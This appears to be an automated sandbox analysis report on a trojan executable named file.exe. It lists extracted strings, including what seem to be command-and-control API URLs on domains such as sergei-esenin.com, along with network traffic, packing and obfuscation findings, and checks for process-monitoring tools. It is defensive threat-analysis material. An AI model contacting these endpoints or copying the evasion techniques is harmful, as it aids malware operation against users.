Source: file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.steamstatic.com/public/javascript/applications/community/libraries~b28b7af69.js?v=
Source: file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.steamstatic.com/public/javascript/applications/community/main.js?v=4XouecKy8sZy&am
Source: file.exe, 00000000.00000003.2075795621.0000000001235000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2082066157.0000000001235000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.steamstatic.com/public/javascript/applications/community/manifest.js?v=r7a4-LYcQOj
Source: file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.steamstatic.com/public/javascript/global.js?v=7qlUmHSJhPRN&l=english
Source: file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
Source: file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.steamstatic.com/public/javascript/modalContent.js?v=XpCpvP7feUoO&l=english
Source: file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
Source: file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.steamstatic.com/public/javascript/profile.js?v=bbs9uq0gqJ-H&l=english
Source: file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.steamstatic.com/public/javascript/promo/stickers.js?v=W8NP8aTVqtms&l=english
Source: file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
Source: file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=english
Source: file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL&l=
Source: file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.steamstatic.com/public/javascript/webui/clientcom.js?v=jq1jQyX1843y&l=english
Source: file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.steamstatic.com/public/shared/css/buttons.css?v=-WV9f1LdxEjq&l=english
Source: file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.steamstatic.com/public/shared/css/motiva_sans.css?v=v7XTmVzbLV33&l=english
Source: file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.steamstatic.com/public/shared/css/shared_global.css?v=uF6G1wyNU-4c&l=english
Source: file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.steamstatic.com/public/shared/css/shared_responsive.css?v=kR9MtmbWSZEp&l=engli
Source: file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&l=engl
Source: file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.steamstatic.com/public/shared/javascript/shared_global.js?v=7glT1n_nkVCs&l=eng
Source: file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSvIAKtunf
Source: file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
Source: file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/en/
Source: file.exe, 00000000.00000003.2068820165.000000000125D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://licendfilteo.site/api
Source: file.exe, 00000000.00000003.2068820165.000000000127F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075795621.00000000012C8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2068820165.0000000001251000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2076843236.00000000012C8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2082296460.00000000012C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sergei-esenin.com/
Source: file.exe, 00000000.00000003.2068820165.000000000127F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sergei-esenin.com/9
Source: file.exe, 00000000.00000003.2075795621.00000000012C8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2076843236.00000000012C8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2082296460.00000000012C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sergei-esenin.com/U
Source: file.exe, 00000000.00000003.2068820165.000000000127F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sergei-esenin.com/a
Source: file.exe, 00000000.00000003.2075795621.000000000127F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2076843236.00000000012C8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2082280270.00000000012C2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2082296460.00000000012C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sergei-esenin.com/api
Source: file.exe, 00000000.00000003.2075795621.00000000012C8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2076843236.00000000012C8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2082296460.00000000012C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sergei-esenin.com/apiBi
Source: file.exe, 00000000.00000003.2068820165.000000000127F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sergei-esenin.com/apiL
Source: file.exe, 00000000.00000003.2068820165.000000000127F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sergei-esenin.com/apiZ
Source: file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2082066157.000000000127F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075795621.000000000127F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/
Source: file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/discussions/
Source: file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
Source: file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/market/
Source: file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: file.exe, 00000000.00000003.2068820165.0000000001251000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
Source: file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2068820165.0000000001238000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
Source: file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2068820165.0000000001238000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: file.exe, 00000000.00000003.2068820165.0000000001251000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900=
Source: file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/workshop/
Source: file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/
Source: file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/about/
Source: file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/explore/
Source: file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/legal/
Source: file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/mobile
Source: file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/news/
Source: file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/stats/
Source: file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: file.exe, 00000000.00000003.2068820165.0000000001251000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://studennotediw.store/api
Source: file.exe, 00000000.00000003.2068820165.000000000127F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2076794436.00000000012C0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075795621.000000000127F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: file.exe, 00000000.00000003.2068820165.000000000127F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/learning/accesa
Source: file.exe, 00000000.00000003.2068820165.000000000127F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
Source: file.exe, 00000000.00000003.2076794436.00000000012C0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075795621.000000000127F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attackH
Source: file.exe, 00000000.00000003.2068783315.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback

Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704

Source: unknown	HTTPS traffic detected: 23.199.218.33:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.5:49705 version: TLS 1.2

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CD0228	0_2_00CD0228
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CFF620	0_2_00CFF620
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D0A0D0	0_2_00D0A0D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E4E0A7	0_2_00E4E0A7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D04040	0_2_00D04040
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CC1000	0_2_00CC1000
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CD2030	0_2_00CD2030
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CC71F0	0_2_00CC71F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CCE1A0	0_2_00CCE1A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CC5160	0_2_00CC5160
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CF82D0	0_2_00CF82D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CF12D0	0_2_00CF12D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CC12F7	0_2_00CC12F7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DD92B9	0_2_00DD92B9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CF23E0	0_2_00CF23E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CCB3A0	0_2_00CCB3A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CC13A3	0_2_00CC13A3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CCA300	0_2_00CCA300
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E904D9	0_2_00E904D9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CF64F0	0_2_00CF64F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CD4487	0_2_00CD4487
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CD049B	0_2_00CD049B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E8B4B5	0_2_00E8B4B5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CEC470	0_2_00CEC470
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E86437	0_2_00E86437
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F0F5E1	0_2_00F0F5E1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CDC5F0	0_2_00CDC5F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CC8590	0_2_00CC8590
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CC35B0	0_2_00CC35B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D086F0	0_2_00D086F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F28699	0_2_00F28699
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D08652	0_2_00D08652
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CC164F	0_2_00CC164F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CFB8C0	0_2_00CFB8C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E848C3	0_2_00E848C3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CFE8A0	0_2_00CFE8A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CCA850	0_2_00CCA850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CF1860	0_2_00CF1860
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CE098B	0_2_00CE098B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D089A0	0_2_00D089A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D48AEE	0_2_00D48AEE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D08A80	0_2_00D08A80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D07AB0	0_2_00D07AB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D04A40	0_2_00D04A40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E8EA79	0_2_00E8EA79
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D71A19	0_2_00D71A19
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CC7BF0	0_2_00CC7BF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CDDB6F	0_2_00CDDB6F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CECCD0	0_2_00CECCD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D06CBF	0_2_00D06CBF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D08C02	0_2_00D08C02
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DB7C3A	0_2_00DB7C3A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CE8D62	0_2_00CE8D62
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CEFD10	0_2_00CEFD10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CEDD29	0_2_00CEDD29
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E7DE96	0_2_00E7DE96
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CD6EBF	0_2_00CD6EBF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CCBEB0	0_2_00CCBEB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CEAE57	0_2_00CEAE57
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D08E70	0_2_00D08E70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CD4E2A	0_2_00CD4E2A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D07FC0	0_2_00D07FC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CC8FD0	0_2_00CC8FD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E8CFC4	0_2_00E8CFC4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E87F7D	0_2_00E87F7D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CCAF10	0_2_00CCAF10

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 00CDD300 appears 152 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 00CCCAA0 appears 48 times

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe

Static PE information: Section: ZLIB complexity 0.9994520936468647

Source: classification engine

Classification label: mal100.troj.evad.winEXE@1/0@10/2

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00CF8220 CoCreateInstance,

0_2_00CF8220

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe

Virustotal: Detection: 49%

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: file.exe

Static file information: File size 2947584 > 1048576

Source: file.exe

Static PE information: Raw size of rhbukrgs is bigger than: 0x100000 < 0x2a6400

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.cc0000.0.unpack :EW;.rsrc :W;.idata :W;rhbukrgs:EW;bntwepgy:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;rhbukrgs:EW;bntwepgy:EW;.taggant:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: file.exe

Static PE information: real checksum: 0x2d1935 should be: 0x2dde94

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name: rhbukrgs
Source: file.exe	Static PE information: section name: bntwepgy
Source: file.exe	Static PE information: section name: .taggant

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E4E0A7 push 54E86EAEh; mov dword ptr [esp], eax	0_2_00E4E0C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E4E0A7 push eax; mov dword ptr [esp], ebx	0_2_00E4E0E1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E4E0A7 push esi; mov dword ptr [esp], ecx	0_2_00E4E0F2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E4E0A7 push esi; mov dword ptr [esp], edi	0_2_00E4E0FC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E4E0A7 push edx; mov dword ptr [esp], esi	0_2_00E4E144
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E4E0A7 push ebx; mov dword ptr [esp], ebp	0_2_00E4E1A4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E4E0A7 push esi; mov dword ptr [esp], edx	0_2_00E4E1D5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F4D029 push 2705DD15h; mov dword ptr [esp], ebp	0_2_00F4D1DE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F4D029 push ecx; mov dword ptr [esp], ebx	0_2_00F4D1EE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E3A1E9 push eax; mov dword ptr [esp], 6BE5B3FEh	0_2_00E3A283
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F8D173 push 7110AF96h; mov dword ptr [esp], eax	0_2_00F8D17B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D12118 push FFFFFFACh; iretd	0_2_00D1211A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F28127 push 5B706700h; mov dword ptr [esp], ebx	0_2_00F2812F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EA310F push 3F74252Bh; mov dword ptr [esp], ecx	0_2_00EA311D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E37114 push 54254D7Bh; mov dword ptr [esp], edx	0_2_00E3713E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E37114 push 6951FD89h; mov dword ptr [esp], eax	0_2_00E37174
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E37114 push 36E8E62Dh; mov dword ptr [esp], ecx	0_2_00E3717F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00E37114 push 3EB7C630h; mov dword ptr [esp], edi	0_2_00E371C4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D122D0 push eax; iretd	0_2_00D122D2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D122DC push esi; iretd	0_2_00D122E2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EB82C6 push eax; mov dword ptr [esp], esi	0_2_00EB82E7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D122E8 push esi; iretd	0_2_00D122EE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D122B1 push ecx; iretd	0_2_00D122B2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DD92B9 push ecx; mov dword ptr [esp], ebx	0_2_00DD92E8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DD92B9 push ebx; mov dword ptr [esp], edi	0_2_00DD9379
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DD92B9 push ebx; mov dword ptr [esp], 7163E191h	0_2_00DD93B5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D122B5 push esp; iretd	0_2_00D122B6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D122BD push ecx; iretd	0_2_00D122BE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D122AD push eax; iretd	0_2_00D122AE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F0F266 push eax; mov dword ptr [esp], ebx	0_2_00F0F26A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F0F266 push edi; mov dword ptr [esp], esp	0_2_00F0F289

Source: file.exe

Static PE information: section name: entropy: 7.978101098832514

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
